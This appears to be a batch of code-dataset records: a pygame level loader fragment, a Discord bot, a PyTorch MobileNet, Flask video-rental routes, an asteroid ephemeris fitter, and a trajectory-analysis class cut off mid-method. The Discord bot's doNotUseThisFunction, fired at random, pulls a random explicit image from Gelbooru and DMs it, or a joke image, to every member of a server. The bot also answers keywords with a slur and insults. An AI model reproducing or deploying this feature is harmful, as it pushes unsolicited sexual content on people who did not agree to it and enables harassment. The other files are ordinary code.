% 4) * 32, (num / 4) * 32), (32, 32))\n self.map_surface.blit(self.tileset, (j * 32, i * 32), tile_rect)\n self.colliders.append(Tile(pygame.rect.Rect((j * 32, i * 32), (32, 32))))\n elif col == 'o': #special 'o' character - visible but not collidable. Gives me more room for not having a physics broadphase.\n self.map_surface.blit(self.tileset, (j * 32, i * 32), pygame.rect.Rect(0, 0, 32, 32))\n \n self.colliders = self.colliders + self.entities #include entities as colliders\n \n def draw(self, screen):\n screen.blit(self.map_surface, (0,0))","sub_path":"src/level.py","file_name":"level.py","file_ext":"py","file_size_in_byte":3679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"456151847","text":"import discord\nimport os\nimport time\nimport random\nimport requests\nimport asyncio\n\nfrom pso2 import pso2_sched\nfrom datetime import datetime\nfrom bs4 import BeautifulSoup\nfrom pygelbooru import Gelbooru\nfrom tokens import token\nfrom discord.ext import commands\nfrom pytz import timezone\n\nbots = commands.Bot(command_prefix='|')\n\ngelbooru = Gelbooru()\n\nglobal forbidden\nforbidden = False\n\njao_string = [discord.File(\"files/jao1.png\"), \n discord.File(\"files/jao2.png\")]\n\nchannel = bots.get_channel(490286224754475008) #ID\ngame = discord.Game(\"Chaser!!\")\n\npso2 = pso2_sched()\n\n@bots.event\nasync def on_ready():\n\n print(f\"Misaka Misaka is turning on!\")\n print(f\"Please wait...\")\n print(f\".\")\n time.sleep(0.1)\n print(f\".\")\n time.sleep(0.3)\n print(f\".\")\n time.sleep(0.6)\n print(f\"Misaka Misaka is on!\")\n\n await bots.change_presence(status=discord.Status.idle, activity=game)\n pass\n\n@bots.command(pass_context=True)\nasync def load(ctx, arg1):\n\n voiceConnect = discord.utils.get(bots.voice_clients, guild=ctx.guild)\n\n try:\n authorVoice = ctx.author.voice.channel\n except AttributeError:\n await ctx.send(\"Entra numa call desgraça\")\n return\n\n if (arg1 == \"carnaval\"):\n\n if (voiceConnect and voiceConnect.is_connected()):\n await voiceConnect.move_to(authorVoice)\n\n voiceConnect = await authorVoice.connect()\n\n await ctx.send(\" \" + \n \"<:cd:684755845891883032>*AGORA TOCANDO NA RÁDIO*<:cd:684755845891883032>\" \n + '\\n' + \"<:fire:684755845891883032>CARNAVAL PROFUNDO<:fire:684755845891883032>\"\n + '\\n' \n + \"<:bee:684756689907351589>BY SINGA DESGRAÇADÃO<:bee:684756689907351589>\")\n\n time.sleep(3)\n voiceConnect.play(discord.FFmpegPCMAudio('files/deep_carnival.mp3'))\n voiceConnect.source = discord.PCMVolumeTransformer(voiceConnect.source)\n voiceConnect.source.volume = 0.5\n time.sleep(3)\n \n if (arg1 == \"exit\"):\n if (voiceConnect and voiceConnect.is_connected()):\n await voiceConnect.disconnect()\n else:\n await ctx.send.img(\"Entra numa call primeiro porra\")\n\n@bots.event\nasync def on_message(message):\n\n global forbidden\n\n await bots.process_commands(message)\n ranInt = random.randint(0, 1000)\n atenaTest = bots.get_guild(413013924515151873)\n\n # Observes the current number\n print(str(message.author) + \": \" + str(ranInt))\n\n if (\"vishnu-flynn\" in message.content.lower()):\n await message.channel.send(\"https://youtu.be/GonRGr9fp40\")\n elif (\"cold steel\" in message.content.lower() and ranInt >= 50):\n await message.add_reaction(\"🤢\")\n await message.channel.send(\"Cala a boca, CSfag\")\n elif (\"singa\" in message.content.lower() and message.author.id != 635128664144609281):\n await message.add_reaction(\"🐝\")\n await message.channel.send(\"YourVinished escreveu: \\n\" +\n \"LOL imagine liking singa \")\n elif (\"test\" in message.content.lower() and message.author.id == 151487135201886209):\n pso2.get_current_schedule()\n pso2.read_current_schedule()\n pso2.read_schedule_table()\n await message.channel.send(embed=pso2_embed(\"Portugal\"))\n \n #if (message.content.lower() == \"aoi\"):\n # await message.channel.send(\"TOKI EGAKU KISEKI TADORI\")\n #if (message.content.lower() == \"kotae sagasu\"):\n # await message.channel.send(\"ONAJI SORA MIAGENAAAAGARA\")\n #if (message.content.lower() == \"kotae sagasu\"):\n # await message.channel.send(\"ONAJI SORA MIAGENAAAAGARA\")\n #if (message.content.lower() == \"mune ni\"):\n # await message.channel.send(\"HIMETA OMOI AFUUUUREDASHI\")\n #if (message.content.lower() == \"sora o kakete\"):\n # await message.channel.send(\"GIIIN IRO NO YA NI KAWAAAARU\")\n #if (message.content.lower() == \"motomeau\"):\n # await message.channel.send(\"KOKORO GA\")\n #if (message.content.lower() == \"tagau\"):\n # await message.channel.send(\"ITAMI WA\")\n #if (message.content.lower() == \"shinjitsu no\"):\n # await message.channel.send(\"MICHI KASUMASERUUUUUU KEREDOOOOO\")\n #if (message.content.lower() == \"kousa suru gin no ya\"):\n # await message.channel.send(\"MITSUMEAU HITOMI NI\") \n #if (message.content.lower() == \"onaji yume\"):\n # await message.channel.send(\"TASHIKA NI, UTSUSHITA\")\n #if (message.content.lower() == \"tatoe tsumazuite mo\"):\n # await message.channel.send(\"TATOE KIZU TSUITE MOOOOOOOOOOOO\")\n #if (message.content.lower() == \"tobitatou\"):\n # await message.channel.send(\"KAZE TSUBASA NIIIIIIII SHITEEEEEEEE\")\n #if (message.content.lower() == \"hi o ukete kagayaku\"):\n # await message.channel.send(\"KIN IRO NO TSUBASA WAAAAAA\")\n #if (message.content.lower() == \"sora ni egaku\"):\n # await message.channel.send(\"INOCHI NO, KISEKI OOOOOO\") \n\n if (ranInt == random.randint(0, 1000) and message.guild.id == 413013924515151873 and not forbidden):\n forbidden = True\n await message.channel.send(\"<:trollface_insano_psicopata:685671384109940737> time to take a Piss\")\n await doNotUseThisFunction(atenaTest)\n forbidden = False\n\nasync def doNotUseThisFunction(guild):\n allMembers = guild.members\n\n for mem in allMembers:\n\n if mem.id == 635128664144609281:\n continue\n\n try:\n memChannel = await mem.create_dm()\n except:\n print(\"\\n--SERVERWIDE_IMG ~ Could not create a DM with \" + mem + \".\\n\")\n continue\n\n result = await gelbooru.random_post(tags=['futanari'])\n\n generateImage(result)\n\n if (random.randint(1, 10) >= 5):\n imgChoice = \"files/ben.png\"\n else: \n imgChoice = \"files/image.jpg\"\n\n try:\n await memChannel.send(file=discord.File(imgChoice, spoiler=True))\n except:\n print(\"\\n--SERVERWIDE_IMG ~ Could not send image to \" + mem + \".\\n\")\n continue\n\n print(\"\\n--SERVERWIDE_IMG ~ Sent random image to \" + mem + \".\\n\")\n\ndef pso2_embed(current_timezone):\n\n times = [\n (00, 00), (00, 30), (1, 00), (1, 30), (2, 00), (4, 30), (5, 00), (5, 30),\n (6, 00), (6, 30), (10, 00), (10, 30), (11, 00), (11, 30), (12, 00), (12, 30),\n (14, 00), (14, 30), (15, 00), (15, 30), (16, 00), (16, 30), (19, 00), (19, 30),\n (20, 00), (20, 30), (21, 00), (21, 30), (22, 00), (22, 30)\n ]\n\n updated_times = []\n\n for time in times:\n updated_times.append(datetime(2020, 1, 1, time[0], time[1], tzinfo=timezone('PST8PDT')).astimezone(timezone(current_timezone)).strftime(\"%H:%M\"))\n\n embed=discord.Embed(title=\"August 2020\", description= current_timezone + \" Timezone (Times may 'overflow' the date.)\", color=0x00b3ff)\n embed.set_author(name=\"Current Month's Schedule for PSO2's Events\", icon_url=\"https://www.trueachievements.com/achievementimages/8339/294405.jpg\")\n embed.set_thumbnail(url=\"https://pbs.twimg.com/profile_images/1205616012478971904/xJO1qWcf.jpg\")\n embed.add_field(name=\"\\n**Week 1**\", value=\"\\u200b\", inline=False)\n #embed.set_image()\n embed.set_footer(text=\"I fucking HATE you.\")\n\n return embed\n\ndef generateImage(link):\n\n with requests.get(link) as jeff:\n imageData = jeff.content\n\n with open(\"./files/image.jpg\", \"wb\") as handler:\n handler.write(imageData)\n \nbots.run(token)","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"443706413","text":"import torch.nn as nn\n\n\nclass DepthwisePointwiseConv(nn.Module):\n def __init__(self, in_channels, out_channels, stride=1):\n super().__init__()\n\n self.depthwise = nn.Sequential(\n nn.Conv2d(in_channels, in_channels, 3, groups=in_channels, stride=stride, padding=1, bias=False),\n nn.BatchNorm2d(in_channels),\n nn.ReLU()\n )\n self.pointwise = nn.Sequential(\n nn.Conv2d(in_channels, out_channels, kernel_size=1, bias=False),\n nn.BatchNorm2d(out_channels),\n nn.ReLU()\n )\n\n def forward(self, x):\n output = self.depthwise(x)\n output = self.pointwise(output)\n\n return output\n\n\nclass MobileNet(nn.Module):\n def __init__(self, num_class=10):\n super().__init__()\n\n self.conv_input = nn.Sequential(\n nn.Conv2d(3, 32, kernel_size=3, padding=1, bias=False),\n nn.BatchNorm2d(32),\n nn.ReLU()\n )\n self.dp1 = DepthwisePointwiseConv(32, 64)\n self.dp2 = nn.Sequential(\n DepthwisePointwiseConv(64, 128, 2),\n DepthwisePointwiseConv(128, 128)\n )\n self.dp3 = nn.Sequential(\n DepthwisePointwiseConv(128, 256, 2),\n DepthwisePointwiseConv(256, 256)\n )\n self.dp4 = nn.Sequential(\n DepthwisePointwiseConv(256, 512, 2),\n DepthwisePointwiseConv(512, 512),\n DepthwisePointwiseConv(512, 512),\n DepthwisePointwiseConv(512, 512),\n DepthwisePointwiseConv(512, 512),\n DepthwisePointwiseConv(512, 512)\n )\n self.dp5 = nn.Sequential(\n DepthwisePointwiseConv(512, 1024, 2),\n DepthwisePointwiseConv(1024, 1024)\n )\n self.avg_pool = nn.AdaptiveAvgPool2d((1, 1))\n self.fc = nn.Linear(1024, num_class)\n\n def forward(self, x):\n output = self.conv_input(x)\n output = self.dp1(output)\n output = self.dp2(output)\n output = self.dp3(output)\n output = self.dp4(output)\n output = self.dp5(output)\n output = self.avg_pool(output)\n output = output.reshape(output.size(0), -1)\n output = self.fc(output)\n\n return output\n","sub_path":"classification/network/mobilenet.py","file_name":"mobilenet.py","file_ext":"py","file_size_in_byte":2228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"138988402","text":"import re\nfrom app import db\nfrom app.models.customer import Customer\nfrom datetime import datetime\nfrom flask import request, Blueprint, make_response, jsonify\nimport requests\nimport os\nfrom app.models.video import Video\nfrom app.models.rental import Rental\n\n\nvideos_bp = Blueprint(\n \"videos\", __name__, url_prefix=\"/videos\")\ncustomers_bp = Blueprint(\n \"customers\", __name__, url_prefix=\"/customers\")\nrentals_bp = Blueprint(\n \"rentals\", __name__, url_prefix=\"/rentals\")\n\n\n# ----------------------------\n# WAVE 1 - CUSTOMER ENDPOINTS\n# ----------------------------\n\n@customers_bp.route(\"\", methods=[\"GET\"], strict_slashes=False)\ndef customer_index():\n customers = Customer.query.all()\n customers_response = [(customer.to_json()) for customer in customers]\n return make_response(jsonify(customers_response), 200)\n\n\n@customers_bp.route(\"\", methods=[\"POST\"], strict_slashes=False)\ndef create_customer():\n request_body = request.get_json()\n if \"name\" in request_body and \"postal_code\" in request_body and \"phone\" in request_body:\n new_customer = Customer(\n name=request_body[\"name\"],\n postal_code=request_body[\"postal_code\"],\n phone=request_body[\"phone\"],\n registered_at=datetime.now()\n )\n db.session.add(new_customer)\n db.session.commit()\n customer_response = {\"id\": new_customer.customer_id}\n return jsonify(customer_response), 201\n # return jsonify(new_customer.to_json()), 201\n return make_response({\"details\": \"You must include a name, postal code, and phone number\"}, 400)\n\n\n@customers_bp.route(\"/\", methods=[\"GET\"], strict_slashes=False)\ndef get_one_customer(customer_id):\n customer = Customer.query.get(customer_id)\n if customer is None:\n return make_response(\"Customer does not exist\", 404)\n return jsonify(customer.to_json()), 200\n\n\n@customers_bp.route(\"/\", methods=[\"PUT\"], strict_slashes=False)\ndef update_customer(customer_id):\n customer = Customer.query.get(customer_id)\n form_data = request.get_json()\n if customer is None:\n return make_response(\"Customer does not exist\", 404)\n elif \"name\" in form_data and \"postal_code\" in form_data and \"phone\" in form_data:\n customer.name = form_data[\"name\"]\n customer.postal_code = form_data[\"postal_code\"]\n customer.phone = form_data[\"phone\"]\n db.session.commit()\n return jsonify(customer.to_json()), 200\n # JSON DICTIONARY !why dis only one\n return make_response({\"details\": \"Bad Request\"}, 400)\n\n\n@customers_bp.route(\"/\", methods=[\"DELETE\"], strict_slashes=False)\ndef delete_customer(customer_id):\n customer = Customer.query.get(customer_id)\n if customer is None:\n return make_response(\"Customer does not exist\", 404)\n db.session.delete(customer)\n db.session.commit()\n # return jsonify(customer.to_json()), 200\n customer_response = {\"id\": customer.customer_id}\n return jsonify(customer_response), 200\n\n\n# --------------------------\n# WAVE 1 - VIDEO ENDPOINTS\n# --------------------------\n\n@videos_bp.route(\"\", methods=[\"GET\"], strict_slashes=False)\ndef video_index():\n videos = Video.query.all()\n videos_response = [(video.to_dict()) for video in videos]\n return make_response(jsonify(videos_response), 200)\n\n\n@videos_bp.route(\"\", methods=[\"POST\"], strict_slashes=False)\ndef create_video():\n request_body = request.get_json()\n if \"title\" in request_body and \"release_date\" in request_body and \"total_inventory\" in request_body:\n new_video = Video(\n title=request_body[\"title\"],\n release_date=request_body[\"release_date\"],\n total_inventory=request_body[\"total_inventory\"],\n available_inventory=request_body[\"total_inventory\"]\n )\n db.session.add(new_video)\n db.session.commit()\n # video_response = {\"id\": new_video.video_id}\n return jsonify({\"id\": new_video.video_id}), 201\n # return jsonify(new_video.to_dict()), 201\n return make_response({\"details\": \"You must include a title, release date, and total inventory\"}, 400)\n\n\n@videos_bp.route(\"/\", methods=[\"GET\"], strict_slashes=False)\ndef get_one_video(video_id):\n video = Video.query.get(video_id)\n if video is None:\n return make_response(\"Video does not exist\", 404)\n return jsonify(video.to_dict()), 200\n\n\n@videos_bp.route(\"/\", methods=[\"PUT\"], strict_slashes=False)\ndef update_video(video_id):\n video = Video.query.get(video_id)\n form_data = request.get_json()\n if video is None:\n return make_response(\"Video does not exist\", 404)\n elif \"title\" in form_data and \"release_date\" in form_data and \"total_inventory\" in form_data:\n video.title = form_data[\"title\"]\n video.release_date = form_data[\"release_date\"]\n video.total_inventory = form_data[\"total_inventory\"]\n db.session.commit()\n return jsonify(video.to_dict()), 200\n return make_response(\"Bad Request\", 400)\n\n\n@videos_bp.route(\"/\", methods=[\"DELETE\"], strict_slashes=False)\ndef delete_video(video_id):\n video = Video.query.get(video_id)\n if video is None:\n return make_response(\"Video does not exist\", 404)\n db.session.delete(video)\n db.session.commit()\n # return jsonify(video.to_dict()), 200\n # video_response = {\"id\": video.video_id}\n return jsonify({\"id\": video.video_id}), 200\n\n\n# ----------------------------------\n# WAVE 2 - (mostly) RENTAL ENDPOINTS\n# ----------------------------------\n\n@rentals_bp.route(\"/check-out\", methods=[\"POST\"], strict_slashes=False)\ndef checking_out():\n request_body = request.get_json()\n # INT ??? (the order).\n try:\n video_id = int(request_body[\"video_id\"])\n customer_id = int(request_body[\"customer_id\"])\n except ValueError or KeyError:\n return make_response({\"details\": \"The customer or video does not exist\"}, 400)\n video = Video.query.get_or_404(request_body[\"video_id\"])\n customer = Customer.query.get_or_404(request_body[\"customer_id\"])\n if video.available_inventory < 1:\n return make_response({\"details\": \"This video doesn't have any current available inventory\"}, 400)\n elif \"customer_id\" in request_body and \"video_id\" in request_body:\n # date = Rental.date_due()\n new_rental = Rental(\n customer_id=request_body[\"customer_id\"],\n video_id=request_body[\"video_id\"],\n )\n customer.videos_checked_out_count += 1\n video.available_inventory -= 1\n db.session.add_all([new_rental, video, customer])\n db.session.commit()\n return ({\n \"customer_id\": customer.customer_id,\n \"video_id\": video.video_id,\n \"due_date\": new_rental.due_date,\n \"videos_checked_out_count\": customer.videos_checked_out_count,\n \"available_inventory\": video.available_inventory\n }, 200)\n return make_response({\"details\": \"Invalid required request body parameters\"}, 400)\n\n\n@rentals_bp.route(\"/check-in\", methods=[\"POST\"], strict_slashes=False)\ndef checking_in():\n request_body = request.get_json()\n video = Video.query.get_or_404(request_body[\"video_id\"])\n customer = Customer.query.get_or_404(request_body[\"customer_id\"])\n if \"customer_id\" in request_body and \"video_id\" in request_body:\n customer.videos_checked_out_count -= 1\n video.available_inventory += 1\n ###\n rental = Rental.query.filter_by(\n video_id=request_body[\"video_id\"], customer_id=request_body[\"customer_id\"]).one_or_none()\n if rental is None:\n return make_response({\"details\": \"The video and customer do not match a current rental\"}, 400)\n db.session.delete(rental)\n db.session.add_all([video, customer])\n db.session.commit()\n return ({\n \"customer_id\": customer.customer_id,\n \"video_id\": video.video_id,\n \"videos_checked_out_count\": customer.videos_checked_out_count,\n \"available_inventory\": video.available_inventory\n }), 200\n # if video is None or customer is None:\n # return make_response({\"details\": \"The customer or video does not exist\"}, 404)\n return make_response({\"details\": \"Invalid required request body parameters\"}, 400)\n\n\n@customers_bp.route(\"//rentals\", methods=[\"GET\"], strict_slashes=False)\ndef get_videos_of_customer(customer_id):\n # request_body = request.get_json()\n rentals = Rental.query.filter(Rental.customer_id == customer_id).all()\n if rentals is None:\n return make_response({\"details\": \"Customer does not exist\"}, 404)\n list_of_rentals = []\n for rental in rentals:\n video = Video.query.get(rental.video_id)\n list_of_rentals.append({\n \"release_date\": video.release_date,\n \"title\": video.title,\n \"due_date\": rental.due_date})\n return jsonify(list_of_rentals), 200\n\n\n@videos_bp.route(\"//rentals\", methods=[\"GET\"], strict_slashes=False)\ndef get_customers_of_video(video_id):\n rentals = Rental.query.filter(Rental.video_id == video_id).all()\n if rentals is None:\n return make_response({\"details\": \"Video does not exist\"}, 404)\n list_of_customers = []\n for rental in rentals:\n customer = Customer.query.get(rental.customer_id)\n list_of_customers.append({\n \"due_date\": rental.due_date,\n \"name\": customer.name,\n \"phone\": customer.phone,\n \"postal_code\": int(customer.postal_code)})\n return jsonify(list_of_customers), 200\n","sub_path":"app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":9611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"14492437","text":"# Monster Ephem Gen.\r\n# Grace Xin\r\n\r\nimport numpy as np\r\nfrom math import *\r\n\r\ndef findQuadrant(sine, cosine):\r\n if cosine > 0 and sine > 0: #1\r\n return asin(sine)\r\n\r\n if cosine < 0 and sine > 0: #2\r\n return acos(cosine)\r\n\r\n if cosine < 0 and sine < 0: #3\r\n return pi - asin(sine)\r\n\r\n if cosine > 0 and sine < 0: #4\r\n return 2*pi + asin(sine)\r\n\r\n# Ephemeris Generation\r\ndef RA_DEC(e, a, I, OM, om, M, ind, t, R):\r\n t0 = JDs[ind]\r\n \r\n sqrtMu = 0.01720209895\r\n mu = sqrtMu**2\r\n \r\n n = sqrtMu/(a**1.5)\r\n \r\n # calculate M\r\n M = M - n*(JDs[2]-t0)\r\n\r\n # calculate E\r\n prevGuess = M\r\n currGuess = M\r\n while True:\r\n currGuess = M+e*sin(prevGuess)\r\n if(abs(currGuess-prevGuess) < 10**-12):\r\n break\r\n prevGuess = currGuess \r\n E = currGuess\r\n\r\n # calculate physics x, y (z = 0)\r\n z = 0\r\n x = a*(cos(E)-e)\r\n y = a*sin(E)*sqrt(1-e**2)\r\n r = sqrt(x**2+y**2)\r\n phys_coords = [x, y, z]\r\n cosnu = x/r\r\n sinnu = y/r\r\n nu = findQuadrant(sinnu, cosnu)\r\n \r\n # calculate ecliptic\r\n R1 = np.array([[cos(om), -sin(om), 0],\r\n [sin(om), cos(om), 0],\r\n [0, 0, 1]])\r\n R2 = np.array([[1, 0, 0 ],\r\n [0, cos(I), -sin(I)],\r\n [0, sin(I), cos(I) ]])\r\n R3 = np.array([[cos(OM), -sin(OM), 0],\r\n [sin(OM), cos(OM), 0],\r\n [0, 0, 1]])\r\n ecliptic = np.matmul(R3, np.matmul(R2, np.matmul(R1, phys_coords)))\r\n \r\n # repeat (1) - (5) for Earth to get\r\n Xe = R[0]\r\n Ye = R[1]\r\n Ze = R[2]\r\n\r\n # get Earth to asteroid rho\r\n rho = ecliptic + R\r\n rho_x = ecliptic[0] + Xe\r\n rho_y = ecliptic[1] + Ye\r\n rho_z = ecliptic[2] + Ze\r\n\r\n # convert ecliptic rho's to equatorial rho's\r\n EQ_rho_x = rho_x\r\n epsolon = radians(23.4358)\r\n EQ_rho_y = rho_y*cos(epsolon) - rho_z*sin(epsolon)\r\n EQ_rho_z = rho_y*sin(epsolon) + rho_z*cos(epsolon)\r\n EQ_rho = [EQ_rho_x, EQ_rho_y, EQ_rho_z]\r\n EQ_mag = sqrt(EQ_rho_x**2+EQ_rho_y**2+EQ_rho_z**2)\r\n for i in range(len(EQ_rho)):\r\n EQ_rho[i] /= EQ_mag\r\n\r\n # calculate RA and DEC\r\n DEC = asin(EQ_rho[2])\r\n sinRA = EQ_rho[1]/cos(DEC)\r\n cosRA = EQ_rho[0]/cos(DEC)\r\n RA = findQuadrant(sinRA, cosRA)\r\n\r\n return degrees(RA)/15, degrees(DEC)\r\n\r\ne, a, I, OM, om, M = [], [], [], [], [], []\r\nEs, As, Is, Os, Ws, Ms = open(\"egrace.txt\"), open(\"agrace.txt\"), open(\"Igrace.txt\"), open(\"Ograce.txt\"), open(\"wgrace.txt\"), open(\"Mgrace.txt\"), \r\nfor line in Es:\r\n trimmed = line.strip()\r\n e.append(float(trimmed))\r\nfor line in As:\r\n trimmed = line.strip()\r\n a.append(float(trimmed))\r\nfor line in Is:\r\n trimmed = line.strip()\r\n I.append(float(trimmed))\r\nfor line in Os:\r\n trimmed = line.strip()\r\n OM.append(float(trimmed))\r\nfor line in Ws:\r\n trimmed = line.strip()\r\n om.append(float(trimmed))\r\nfor line in Ms:\r\n trimmed = line.strip()\r\n M.append(float(trimmed))\r\n#print(e, a, I, OM, om, M)\r\nRAs, DECs, JDs = [], [], [] #7 each\r\nRs = np.array([[0.0, 0.0, 0.0],\r\n [0.0, 0.0, 0.0],\r\n [0.0, 0.0, 0.0],\r\n [0.0, 0.0, 0.0],\r\n [0.0, 0.0, 0.0],\r\n [0.0, 0.0, 0.0],\r\n [0.0, 0.0, 0.0]]) #7 by 3 array\r\n\r\ndata = open(\"Input.txt\")\r\nlineN = 0\r\nfor line in data:\r\n values = line.split()\r\n Y = int(values[0])\r\n m = int(values[1])\r\n D = int(values[2])\r\n t = values[3]\r\n timeParts = t.split(\":\")\r\n UT = float(timeParts[0])+float(timeParts[1])/60+float(timeParts[2])/3600\r\n J0 = 367*Y-int((7/4)*(Y+int((m+9)/12)))+int(275*m/9)+D+1721013.5\r\n JD = J0 + UT/24\r\n JDs.append(JD)\r\n ra = float(values[4])+float(values[5])/60+float(values[6])/3600\r\n RAs.append(radians(ra*15))\r\n if float(values[7]) > 0:\r\n dec = float(values[7])+float(values[8])/60+float(values[9])/3600\r\n else:\r\n dec = float(values[7])-float(values[8])/60-float(values[9])/3600\r\n DECs.append(radians(dec))\r\n A = float(values[10])\r\n B = float(values[11])\r\n C = float(values[12])\r\n Rs[lineN][0] = A\r\n Rs[lineN][1] = B\r\n Rs[lineN][2] = C\r\n lineN += 1\r\n#print(RAs, DECs, JDs)\r\n#print(Rs)\r\n\r\ncE, cA, cI, cO, cW, cM = 0, 0, 0, 0, 0, 0\r\nminErr = 10**31\r\nfor index in range(len(e)):\r\n currE, currA, currI, currO, currW, currM = e[index], a[index], I[index], OM[index], om[index], M[index]\r\n t = 2458685.75\r\n fitRAs, fitDECs = [], []\r\n for ind in range(0, 7):\r\n ra, dec, jd = RAs[ind], DECs[ind], JDs[ind]\r\n R = Rs[ind]\r\n RA, DEC = RA_DEC(currE, currA, currI, currO, currW, currM, ind, t, R)\r\n fitRAs.append(RA)\r\n fitDECs.append(DEC)\r\n alphaSq, deltaSq = 0, 0\r\n for ind in range(len(RAs)):\r\n alphaSq += (RAs[ind] - fitRAs[ind])**2\r\n deltaSq += (DECs[ind] - fitDECs[ind])**2\r\n error = sqrt((alphaSq+deltaSq)/(14 - 6))\r\n if(error < minErr):\r\n minErr = error\r\n cE, cA, cI, cO, cW, cM = currE, currA, currI, currO, currW, currM\r\nprint(\"a = %f AU\" %cA)\r\nprint(\"e = %f\" %cE)\r\nprint(\"I = %f degrees\" %cI)\r\nprint(\"OM = %f degrees\" %cO)\r\nprint(\"om = %f degrees\" %cW)\r\nprint(\"M = %f degrees\" %cM)\r\n","sub_path":"Coding/Monster EC/monsterEphem.py","file_name":"monsterEphem.py","file_ext":"py","file_size_in_byte":5249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"63519938","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.basemap import Basemap\n\n# Global variables\nEARTH_RADIUS = 6371e3 # meters\n\ndef haversine(latitude1, longitude1, latitude2, longitude2):\n \"\"\" Great-circle distance between two points. Latitudes and longitudes\n are 1D NumPy arrays. \n Returns a 1D array of distances between two trajectories. \"\"\"\n\n lat1 = np.radians(latitude1)\n lat2 = np.radians(latitude2)\n lon1 = np.radians(longitude1)\n lon2 = np.radians(longitude2)\n\n dlat = np.absolute(lat2 - lat1)\n dlon = np.absolute(lon2 - lon1)\n\n a = (np.sin(dlat / 2) ** 2 + np.cos(lat1) * np.cos(lat2) \n * np.sin(dlon / 2) ** 2)\n c = 2 * np.arctan2(np.sqrt(a), np.sqrt(1 - a)) \n d = EARTH_RADIUS * c # distance in meters\n return d\n\nclass Trajectory:\n \"\"\" Version of trajectory class for analyzing trajectory data from \n text files.\"\"\"\n \n def __init__(self,\n scheme=\"grid\", # \"grid\" or \"force\"\n timestep=90, \n source=\"model\", # \"model\" or \"hysplit\"\n location=\"boston\", # \"boston\"\n vertical=\"3D\"): # \"3D\" or \"isobaric\" \n self.scheme = scheme # Trajectory calculation scheme\n self.timestep = timestep # Timestep in seconds\n self.source = source # Study models or HYSPLIT trajectories\n self.location = location # Parcel launch site \n self.vertical = vertical # Vertical transport scheme\n\n if source == \"model\":\n lat_title = (\"trajectory_data/{0}_latitudes_{1}_{2}.txt\").format(\n self.location, self.scheme, self.timestep)\n lon_title = (\"trajectory_data/{0}_longitudes_{1}_{2}.txt\").format(\n self.location, self.scheme, self.timestep)\n u_title = (\"trajectory_data/{0}_trajectory_u_{1}_{2}.txt\").format(\n self.location, self.scheme, self.timestep)\n v_title = (\"trajectory_data/{0}_trajectory_v_{1}_{2}.txt\").format(\n self.location, self.scheme, self.timestep)\n\n self.latitudes = np.loadtxt(lat_title)\n self.longitudes = np.loadtxt(lon_title)\n self.trajectory_u = np.loadtxt(u_title)\n self.trajectory_v = np.loadtxt(v_title)\n\n # List of times in hours\n self.times = np.arange(np.size(self.latitudes[:,0])) * (\n self.timestep / 60 ** 2)\n\n if source == \"hysplit\":\n\n self.latitudes, self.longitudes, self.times = self.load_hysplit()\n self.trajectory_u = np.zeros_like(self.latitudes)\n self.trajectory_v = np.zeros_like(self.longitudes)\n\n self.mean_latitudes, self.mean_longitudes = self.mean_trajectory()\n\n def load_hysplit(self):\n # Get 1D lat and lon vectors from file\n num_trajectories = 25\n file = np.loadtxt(\"trajectory_data/hysplit_{0}_{1}.txt\".format(\n self.vertical, self.location))\n file_time = file[:,8] # time in hours\n file_lat = file[:,9]\n file_lon = file[:,10]\n\n # Initialize latitude and longitude arrays\n num_rows = np.size(file_lat) // num_trajectories\n latitude = np.zeros((num_rows, num_trajectories))\n longitude = np.zeros_like(latitude)\n time = np.zeros_like(latitude)\n \n # Separate lats and lons by trajectory\n for i in np.arange(np.size(latitude)):\n row = i // num_trajectories\n column = i % num_trajectories\n\n time[row, column] = file_time[i]\n latitude[row, column] = file_lat[i]\n longitude[row, column] = file_lon[i]\n\n return latitude, longitude, time\n\n def mean_trajectory(self):\n \"\"\" Get the centroid of parcels at each timestep. \"\"\"\n\n # Convert latitudes and longitudes to Cartesian coordinates\n x = (np.cos(np.radians(self.latitudes)) * \n np.cos(np.radians(self.longitudes)))\n y = (np.cos(np.radians(self.latitudes)) * \n np.sin(np.radians(self.longitudes)))\n z = np.sin(np.radians(self.latitudes))\n\n # Get average x, y, z values\n mean_x = np.mean(x, axis=1)\n mean_y = np.mean(y, axis=1)\n mean_z = np.mean(z, axis=1)\n\n # Convert average values to trajectory latitudes and longitudes\n mean_longitudes = np.degrees(np.arctan2(mean_y, mean_x))\n hypotenuse = np.sqrt(mean_x ** 2 + mean_y ** 2)\n mean_latitudes = np.degrees(np.arctan2(mean_z, hypotenuse))\n\n return mean_latitudes, mean_longitudes\n\n def rms_distance(self):\n \"\"\" Calculate the root mean square distance of each trajectory from the\n mean trajectory. \"\"\"\n\n # Make mean lat and lon arrays the same shape as trajectory arrays\n mean_lat = np.repeat(self.mean_latitudes[:, np.newaxis], \n np.size(self.latitudes, axis=1), axis=1)\n mean_lon = np.repeat(self.mean_longitudes[:, np.newaxis], \n np.size(self.longitudes, axis=1), axis=1)\n\n rms = np.sqrt(np.mean(haversine(mean_lat, mean_lon, \n self.latitudes, self.longitudes) ** 2, axis=1))\n\n return rms\n\n def plot_ortho(self, lat_center=90, lon_center=-50, savefig=False):\n \"\"\" Orthographic projection plot.\"\"\"\n map = Basemap(projection='ortho', lon_0=lon_center, lat_0=lat_center, \n resolution='c')\n map.drawcoastlines(linewidth=0.25, color='gray')\n map.drawcountries(linewidth=0)\n map.fillcontinents(color='white',lake_color='white', zorder=1)\n # draw the edge of the map projection region (the projection limb)\n map.drawmapboundary(fill_color='white')\n map.plot(self.longitudes, self.latitudes,\n latlon=True, zorder=2, color='black')\n #map.plot(self.mean_longitudes, self.mean_latitudes,\n # latlon=True, zorder=2, color='green')\n if savefig == True:\n filename1 = \"plots/friction_180.pdf\"\n plt.savefig(filename1)\n\n plt.show()\n return map\n\n def graph_speed(self):\n \"\"\" Graph of u and v along the trajectory. \"\"\"\n lat_length = 111.32e3 # Length of a degree of latitude in meters\n time = np.arange(np.size(self.latitudes[:,0])) * (self.timestep \n / 